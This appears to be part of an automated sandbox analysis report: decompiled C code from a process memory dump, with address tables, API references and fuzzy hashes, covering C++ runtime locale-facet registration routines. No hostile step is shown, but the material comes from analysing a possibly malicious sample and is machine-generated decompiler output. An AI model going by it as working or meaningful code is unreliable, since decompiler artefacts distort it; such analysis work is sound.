                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F874B4
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F874BE
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • moneypunct.LIBCPMT ref: 00F874F8
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F8750F
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F8752F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                • String ID:
                                                                                                • API String ID: 419941038-0
                                                                                                • Opcode ID: 47a5af924418e619db59d235d41b3105f92940a8d05f9013b4656fc8f716d577
                                                                                                • Instruction ID: febf0cb196374e58a7e179b3d8231a53526b3c17efa81c41344def985c377c9c
                                                                                                • Opcode Fuzzy Hash: 47a5af924418e619db59d235d41b3105f92940a8d05f9013b4656fc8f716d577
                                                                                                • Instruction Fuzzy Hash: 3701A5369041199BCB04FB64CC157EE7761AF84760F64400AE405AB292DF78DA02AB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F875D7(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v28;
                                                                                                				signed int _t105;
                                                                                                				void* _t187;
                                                                                                				short* _t271;
                                                                                                				void* _t296;
                                                                                                				signed int _t299;
                                                                                                				signed int _t300;
                                                                                                				signed int _t301;
                                                                                                				signed int _t302;
                                                                                                				signed int _t303;
                                                                                                				signed int _t304;
                                                                                                				signed int _t305;
                                                                                                				signed int _t307;
                                                                                                				signed int _t308;
                                                                                                				signed int _t309;
                                                                                                				signed int _t310;
                                                                                                				signed int _t311;
                                                                                                				signed int _t312;
                                                                                                				signed int _t313;
                                                                                                				signed int _t314;
                                                                                                				short* _t315;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t307 =  *0xfd0ae4; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t307;
                                                                                                				_t105 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t298 = _t105;
                                                                                                				if(_t105 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t298);
                                                                                                				} else {
                                                                                                					if(_t307 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F88965(_t298, _t307, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t298, _t307);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t308 =  *0xfd0ae0; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t308;
                                                                                                							_t299 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t299;
                                                                                                							if(_t299 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t299);
                                                                                                							} else {
                                                                                                								__eflags = _t308;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F889E9(_t299, _t308, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t299, _t308);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t309 =  *0xfd0af4; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t309;
                                                                                                										_t300 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t300;
                                                                                                										if(_t300 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t300);
                                                                                                										} else {
                                                                                                											__eflags = _t309;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F88A6E(_t300, _t309, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t300, _t309);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t310 =  *0xfd0af8; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t310;
                                                                                                													_t301 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t301;
                                                                                                													if(_t301 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t301);
                                                                                                													} else {
                                                                                                														__eflags = _t310;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F88AD6(_t301, _t310, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t301, _t310);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t311 =  *0xfd0afc; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t311;
                                                                                                																_t302 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t302;
                                                                                                																if(_t302 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t302);
                                                                                                																} else {
                                                                                                																	__eflags = _t311;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F88B3E(_t296, _t302, _t311, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t302, _t311);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t312 =  *0xfd0b18; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t312;
                                                                                                																			_t303 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t303;
                                                                                                																			if(_t303 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t303);
                                                                                                																			} else {
                                                                                                																				__eflags = _t312;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F88BB9(_t303, _t312, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t303, _t312);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t313 =  *0xfd0ae8; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t313;
                                                                                                																						_t304 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t304;
                                                                                                																						if(_t304 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t304);
                                                                                                																						} else {
                                                                                                																							__eflags = _t313;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								__eflags = E00F88C25(_t304, _t313, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t304, _t313);
                                                                                                																									E00F856E6( &_v20, 0);
                                                                                                																									_t314 =  *0xfd0b1c; // 0x0
                                                                                                																									_v4 = _v4 & 0x00000000;
                                                                                                																									_v16 = _t314;
                                                                                                																									_t305 = E00F78A40(_a8, E00F789D0());
                                                                                                																									__eflags = _t305;
                                                                                                																									if(_t305 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E( &_v20);
                                                                                                																										return E00FB388C(_t305);
                                                                                                																									} else {
                                                                                                																										__eflags = _t314;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push(_a8);
                                                                                                																											_push( &_v16);
                                                                                                																											_t187 = E00F88C91(_t305, _t314, __eflags);
                                                                                                																											_pop(_t271);
                                                                                                																											__eflags = _t187 - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(_t314);
                                                                                                																												_t315 = _t271;
                                                                                                																												_t98 = _t315 + 0x10;
                                                                                                																												 *_t98 =  *(_t315 + 0x10) & 0x00000000;
                                                                                                																												__eflags =  *_t98;
                                                                                                																												 *((intOrPtr*)(_t315 + 0x14)) = 7;
                                                                                                																												 *_t315 = 0;
                                                                                                																												E00F8D9F3(_v28);
                                                                                                																												return _t315;
                                                                                                																											} else {
                                                                                                																												_t305 = _v16;
                                                                                                																												_v16 = _t305;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t305);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t305 + 4))))();
                                                                                                																												 *0xfd0b1c = _t305;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t305 = _t314;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t304 = _v16;
                                                                                                																									_v16 = _t304;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t304);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t304 + 4))))();
                                                                                                																									 *0xfd0ae8 = _t304;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t304 = _t313;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t303 = _v16;
                                                                                                																						_v16 = _t303;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t303);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t303 + 4))))();
                                                                                                																						 *0xfd0b18 = _t303;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t303 = _t312;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t302 = _v16;
                                                                                                																			_v16 = _t302;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t302);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t302 + 4))))();
                                                                                                																			 *0xfd0afc = _t302;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t302 = _t311;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t301 = _v16;
                                                                                                																_v16 = _t301;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t301);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t301 + 4))))();
                                                                                                																 *0xfd0af8 = _t301;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t301 = _t310;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t300 = _v16;
                                                                                                													_v16 = _t300;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t300);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t300 + 4))))();
                                                                                                													 *0xfd0af4 = _t300;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t300 = _t309;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t299 = _v16;
                                                                                                										_v16 = _t299;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t299);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t299 + 4))))();
                                                                                                										 *0xfd0ae0 = _t299;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t299 = _t308;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t298 = _v16;
                                                                                                							_v16 = _t298;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t298);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t298 + 4))))();
                                                                                                							 *0xfd0ae4 = _t298;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t298 = _t307;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}



























                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f87608
                                                                                                0x00f8760d
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F875DE
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F875E8
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • moneypunct.LIBCPMT ref: 00F87622
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F87639
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87659
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                • String ID:
                                                                                                • API String ID: 419941038-0
                                                                                                • Opcode ID: b9ecfedb4445b84dadb49a916d9e8884ee922a5d62d371f4edfcfc43ded2d9df
                                                                                                • Instruction ID: ecc45a132a92e529ca705ff0babe35e95075411332c8a74db923081669283a17
                                                                                                • Opcode Fuzzy Hash: b9ecfedb4445b84dadb49a916d9e8884ee922a5d62d371f4edfcfc43ded2d9df
                                                                                                • Instruction Fuzzy Hash: C601A1359006199BCB04FB64CC45BEE77B5AF84B60F64410AE405AB291DF38DA02BB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F915AF(void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t47;
                                                                                                				void* _t74;
                                                                                                				signed int _t111;
                                                                                                				signed int _t123;
                                                                                                				signed int _t124;
                                                                                                				signed int _t126;
                                                                                                				signed int _t127;
                                                                                                				signed int _t128;
                                                                                                				signed int _t129;
                                                                                                				void* _t133;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t133 - 0x14, 0);
                                                                                                				_t126 =  *0xfd0b54; // 0x0
                                                                                                				 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
                                                                                                				 *(_t133 - 0x10) = _t126;
                                                                                                				_t47 = E00F78A40( *((intOrPtr*)(_t133 + 8)), E00F789D0());
                                                                                                				_t122 = _t47;
                                                                                                				if(_t47 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t133 - 0x14);
                                                                                                					return E00FB388C(_t122);
                                                                                                				} else {
                                                                                                					if(_t126 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t133 + 8)));
                                                                                                						_push(_t133 - 0x10);
                                                                                                						__eflags = E00F91AD3(_t122, _t126, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t122, _t126);
                                                                                                							E00F856E6(_t133 - 0x14, 0);
                                                                                                							_t127 =  *0xfd0b5c; // 0x0
                                                                                                							 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
                                                                                                							 *(_t133 - 0x10) = _t127;
                                                                                                							_t123 = E00F78A40( *((intOrPtr*)(_t133 + 8)), E00F789D0());
                                                                                                							__eflags = _t123;
                                                                                                							if(_t123 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E(_t133 - 0x14);
                                                                                                								return E00FB388C(_t123);
                                                                                                							} else {
                                                                                                								__eflags = _t127;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push( *((intOrPtr*)(_t133 + 8)));
                                                                                                									_push(_t133 - 0x10);
                                                                                                									__eflags = E00F91B58(_t123, _t127, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t123, _t127);
